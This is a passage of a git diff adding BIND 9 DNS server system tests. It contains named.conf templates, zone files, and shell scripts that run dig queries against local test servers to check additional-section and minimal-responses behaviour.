obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + recursion no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + notify no; + minimal-responses yes; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/additional/ns2/root.db b/bin/tests/system/additional/ns2/root.db new file mode 100644 index 0000000..728bdde --- /dev/null +++ b/bin/tests/system/additional/ns2/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. IN SOA ns2. hostmaster ( 2 8H 2H 4W 1D); +. NS ns2. +ns1. A 10.53.0.1 +ns2. A 10.53.0.2 +rt.example. NS ns1. +naptr.example. NS ns1. +rt2.example. NS ns1. +naptr2.example. NS ns1. +nid.example. NS ns1. + diff --git a/bin/tests/system/additional/ns3/ex.db b/bin/tests/system/additional/ns3/ex.db new file mode 100644 index 0000000..c893a84 --- /dev/null +++ b/bin/tests/system/additional/ns3/ex.db @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 + NS ns1.ex2. +ns1 A 10.53.0.1 diff --git a/bin/tests/system/additional/ns3/ex2.db b/bin/tests/system/additional/ns3/ex2.db new file mode 100644 index 0000000..f9039cf --- /dev/null +++ b/bin/tests/system/additional/ns3/ex2.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 diff --git a/bin/tests/system/additional/ns3/named.conf.in b/bin/tests/system/additional/ns3/named.conf.in new file mode 100644 index 0000000..2bd01c9 --- /dev/null +++ b/bin/tests/system/additional/ns3/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + minimal-responses no; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "ex" { + type primary; + file "ex.db"; +}; + +zone "ex2" { + type primary; + file "ex2.db"; +}; diff --git a/bin/tests/system/additional/ns3/root.hint b/bin/tests/system/additional/ns3/root.hint new file mode 100644 index 0000000..ef6ee6f --- /dev/null +++ b/bin/tests/system/additional/ns3/root.hint @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS ns2. +ns2. A 10.53.0.2 diff --git a/bin/tests/system/additional/setup.sh b/bin/tests/system/additional/setup.sh new file mode 100644 index 0000000..62fe66a --- /dev/null +++ b/bin/tests/system/additional/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +copy_setports ns1/named1.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf diff --git a/bin/tests/system/additional/tests.sh b/bin/tests/system/additional/tests.sh new file mode 100644 index 0000000..fbb9ce0 --- /dev/null +++ b/bin/tests/system/additional/tests.sh @@ -0,0 +1,378 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +dotests() { + n=`expr $n + 1` + echo_i "test with RT, single zone (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t RT rt.rt.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, two zones (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t RT rt.rt2.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, single zone (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NAPTR nap.naptr.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, two zones (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NAPTR nap.hang3b.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with LP (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t LP nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + no) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + yes) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + ;; + no-auth) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NID ns1.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID + LP (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NID nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, single zone (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t RT rt.rt.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, two zones (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t RT rt.rt2.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, single zone (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NAPTR nap.naptr.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, two zones (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NAPTR nap.hang3b.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with LP (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t LP nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + no) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + yes) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + ;; + no-auth) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NID ns1.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID + LP (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NID nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NS, root zone ($n)" + ret=0 + $DIG $DIGOPTS -t NS . @10.53.0.1 > dig.out.$n || ret=1 + # Always expect glue for root priming queries, regardless $minimal + grep 'ADDITIONAL: 3' dig.out.$n > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NS, non-root zone ($n)" + ret=0 + $DIG $DIGOPTS -t NS rt.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + yes) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no-auth) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi +} + +echo_i "testing with 'minimal-responses yes;'" +minimal=yes +dotests + +echo_i "reconfiguring server: minimal-responses no" +copy_setports ns1/named2.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +echo_i "testing with 'minimal-responses no;'" +minimal=no +dotests + +n=`expr $n + 1` +echo_i "testing with 'minimal-any no;' ($n)" +ret=0 +$DIG $DIGOPTS -t ANY www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 2" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "reconfiguring server: minimal-any yes" +copy_setports ns1/named3.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +n=`expr $n + 1` +echo_i "testing with 'minimal-any yes;' over UDP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +notcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi +n=`expr $n + 1` + +echo_i "testing with 'minimal-any yes;' over TCP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +tcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing with 'minimal-any yes;' over UDP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +notcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "testing with 'minimal-responses no-auth;'" +minimal=no-auth +dotests + +echo_i "reconfiguring server: minimal-responses no-auth-recursive" +copy_setports ns1/named4.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +echo_i "testing with 'minimal-responses no-auth-recursive;'" +minimal=no-auth-recursive +dotests + +n=`expr $n + 1` +echo_i "testing returning TLSA records with MX query ($n)" +ret=0 +$DIG $DIGOPTS -t mx mx.example @10.53.0.1 > dig.out.$n || ret=1 +grep "mx\.example\..*MX.0 mail\.mx\.example" dig.out.$n > /dev/null || ret=1 +grep "mail\.mx\.example\..*A.1\.2\.3\.4" dig.out.$n > /dev/null || ret=1 +grep "_25\._tcp\.mail\.mx\.example\..*TLSA.3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing returning TLSA records with SRV query ($n)" +ret=0 +$DIG $DIGOPTS -t srv _xmpp-client._tcp.srv.example @10.53.0.1 > dig.out.$n || ret=1 +grep "_xmpp-client\._tcp\.srv\.example\..*SRV.1 0 5222 server\.srv\.example" dig.out.$n > /dev/null || ret=1 +grep "server\.srv\.example\..*A.1\.2\.3\.4" dig.out.$n > /dev/null || ret=1 +grep "_5222\._tcp\.server\.srv\.example\..*TLSA.3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "reconfiguring server: minimal-responses no" +copy_setports ns1/named2.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +n=`expr $n + 1` +echo_i "testing NS handling in ANY responses (authoritative) ($n)" +ret=0 +$DIG $DIGOPTS -t ANY rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +grep "NS[ ]*ns" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing NS handling in ANY responses (recursive) ($n)" +ret=0 +$DIG $DIGOPTS -t ANY rt.example @10.53.0.3 > dig.out.$n || ret=1 +grep "AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +grep "NS[ ]*ns" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing out-of-zone additional data from auth zones (authoritative) ($n)" +ret=0 +$DIG $DIGOPTS -t NS rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ADDITIONAL: 2" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing out-of-zone additional data from auth zones (recursive) ($n)" +ret=0 +$DIG $DIGOPTS -t NS ex @10.53.0.3 > dig.out.$n || ret=1 +grep "ADDITIONAL: 3" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/addzone/clean.sh b/bin/tests/system/addzone/clean.sh new file mode 100644 index 0000000..5e94b5c --- /dev/null +++ b/bin/tests/system/addzone/clean.sh @@ -0,0 +1,44 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ./dig.out.* +rm -f ./rndc.out* +rm -f ./showzone.out* +rm -f ./zonestatus.out* +rm -f ./*/named.conf +rm -f ./*/named.memstats +rm -f ./ns1/*.nzf ./ns1/*.nzf~ +rm -f ./ns1/*.nzd ./ns1/*.nzd-lock +rm -f ./ns2/*.nzf ./ns2/*.nzf~ +rm -f ./ns2/*.nzd ./ns2/*.nzd-lock +rm -f ./ns3/*.nzf ./ns3/*.nzf~ +rm -f ./ns3/*.nzd ./ns3/*.nzd-lock +rm -f ./ns2/core* +rm -f ./ns2/inline.db.jbk +rm -f ./ns2/inline.db.signed +rm -f ./ns2/inlinesec.bk* +rm -rf ./ns2/new-zones +rm -f ./ns*/named.lock +rm -f ./ns*/named.run ./ns*/named.run.prev +rm -f ./ns2/nzf-* +rm -f ./ns3/named.conf +rm -f ./ns3/*.nzf ./ns3/*.nzf~ +rm -f ./ns3/*.nzd ns3/*.nzd-lock +rm -f ./ns3/inlinesec.db +rm -f ./ns1/redirect.db +rm -f ./ns2/redirect.db +rm -f ./ns2/redirect.bk +rm -f ./ns3/redirect.db +rm -f ./ns*/managed-keys.bind* ns*/*.mkeys* +rm -f ./nzd2nzf.out.* +rm -f ./wait_for_message.* diff --git a/bin/tests/system/addzone/ns1/inlinesec.db b/bin/tests/system/addzone/ns1/inlinesec.db new file mode 100644 index 0000000..eb9d042 --- /dev/null +++ b/bin/tests/system/addzone/ns1/inlinesec.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN inlinesec.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/addzone/ns1/named.conf.in b/bin/tests/system/addzone/ns1/named.conf.in new file mode 100644 index 0000000..afd7c31 --- /dev/null +++ b/bin/tests/system/addzone/ns1/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + allow-query { any; }; + allow-new-zones yes; + recursion no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "inlinesec.example" { + type primary; + file "inlinesec.db"; +}; + +zone "." { + type redirect; + file "redirect.db"; +}; diff --git a/bin/tests/system/addzone/ns1/redirect.db.1 b/bin/tests/system/addzone/ns1/redirect.db.1 new file mode 100644 index 0000000..5dcdd1b --- /dev/null +++ b/bin/tests/system/addzone/ns1/redirect.db.1 @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 0 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/addzone/ns1/redirect.db.2 b/bin/tests/system/addzone/ns1/redirect.db.2 new file mode 100644 index 0000000..4dcbdbc --- /dev/null +++ b/bin/tests/system/addzone/ns1/redirect.db.2 @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 1 0 0 0 0 +@ 0 NS . diff --git a/bin/tests/system/addzone/ns2/added.db b/bin/tests/system/addzone/ns2/added.db new file mode 100644 index 0000000..286e717 --- /dev/null +++ b/bin/tests/system/addzone/ns2/added.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +;$ORIGIN added.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/addzone/ns2/default.nzf.in b/bin/tests/system/addzone/ns2/default.nzf.in new file mode 100644 index 0000000..d9740f5 --- /dev/null +++ b/bin/tests/system/addzone/ns2/default.nzf.in @@ -0,0 +1,14 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone previous.example { type primary; file "previous.db"; }; diff --git a/bin/tests/system/addzone/ns2/hints.db b/bin/tests/system/addzone/ns2/hints.db new file mode 100644 index 0000000..e0f186c --- /dev/null +++ b/bin/tests/system/addzone/ns2/hints.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.1 diff --git a/bin/tests/system/addzone/ns2/inline.db b/bin/tests/system/addzone/ns2/inline.db new file mode 100644 index 0000000..c968104 --- /dev/null +++ b/bin/tests/system/addzone/ns2/inline.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN inline.example. +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + MX 10 mail + +a A 10.0.0.1 +mail A 10.0.0.2 diff --git a/bin/tests/system/addzone/ns2/named1.conf.in b/bin/tests/system/addzone/ns2/named1.conf.in new file mode 100644 index 0000000..eb8519a --- /dev/null +++ b/bin/tests/system/addzone/ns2/named1.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + allow-query { any; }; + recursion no; + allow-new-zones yes; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "normal.example" { + type primary; + file "normal.db"; +}; + +zone "finaldot.example." { + type primary; + file "normal.db"; +}; diff --git a/bin/tests/system/addzone/ns2/named2.conf.in b/bin/tests/system/addzone/ns2/named2.conf.in new file mode 100644 index 0000000..33e45b9 --- /dev/null +++ b/bin/tests/system/addzone/ns2/named2.conf.in @@ -0,0 +1,67 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +options { + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; +}; + +view internal { + match-clients { 10.53.0.2; }; + allow-new-zones no; + recursion yes; + + response-policy { zone "policy"; }; + + zone "." { + type hint; + file "../../common/root.hint"; + }; + + zone "policy" { + type primary; + file "normal.db"; + }; +}; + +view external { + match-clients { any; }; + allow-new-zones yes; + + zone "." { + type hint; + file "../../common/root.hint"; + }; +}; + +# This view is only here to test that configuration context is cleaned +# up correctly when using multiple named ACLs (regression test for RT #22739) +acl match { none; }; +acl nobody { none; }; +view extra { + match-clients { match; }; + allow-new-zones yes; + allow-transfer { nobody; }; + allow-query { nobody; }; + allow-recursion { nobody; }; +}; diff --git 